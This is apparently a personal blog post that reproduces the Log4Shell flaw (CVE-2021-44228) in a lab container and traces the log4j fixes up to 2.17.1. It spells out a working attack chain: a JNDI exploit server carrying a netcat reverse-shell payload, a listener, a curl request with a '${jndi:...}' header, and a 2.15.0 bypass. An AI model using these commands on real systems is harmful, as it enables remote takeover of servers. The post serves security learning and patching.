Follow log4j vulnerability: from 2.14.1 to 2.17.1
I triggered a log4j vulnerability for a test and followed patches from 2.14.1 to 2.17.1 of log4j.
How to trigger log4j vulnerability
There are several vulnerabilities for log4j. Among them, I chose CVE-2021-44228 and triggered a reverse shell: executing shell commands from a remote machine.
-
Build a vulnerable environment: christophetd/log4shell-vulnerable-app. Clone this repository and
docker build ./. FYI, this environment is based on spring-boot-starter-log4j2:2.6.1 so it uses 2.14.1 for log4j. -
Download JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar and run the command below. I add a command to take a reverse shell. You can change the command inside of
".
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc <VICTIM_IP> 4444 -e /bin/sh" -A <ATTACKER_IP>
-
Open 4444 port with
nc -lvp 4444in the attacker machine. -
Send a header with the command below.
curl <VICTIM_IP>:8080 -H 'X-Api-Version:${jndi:<TARGET_ENV>}'
The result is looks like this:
On the top right window, you can see that ls command is working well!
Follow patches
All the changes of each log4j version are on here: Log4j – Changes. I picked only patches related to vulnerabilities in the table below.
In 2.15.0, the method I wrote above is not working but it is still vulnerable to commands using jndi.
(Can be bypassed by adding 127.0.0.1# right after ldap://.)
Because of this jndi issue, JNDI is disabled by default in 2.16.0.
If your service uses log4j, it is now highly recommended to update a log4j version to 2.17.1.
References
- 사상 최악! Log4J 해커들의 공격. 대응방법은?
- Apache log4j 취약점 CVE-2021-44228 POC
- How Log4j Vulnerability Could Impact You
- Analysing and Reproducing PoC for Log4j 2.15.0
💬 Any comments and suggestions will be appreciated.
Leave a comment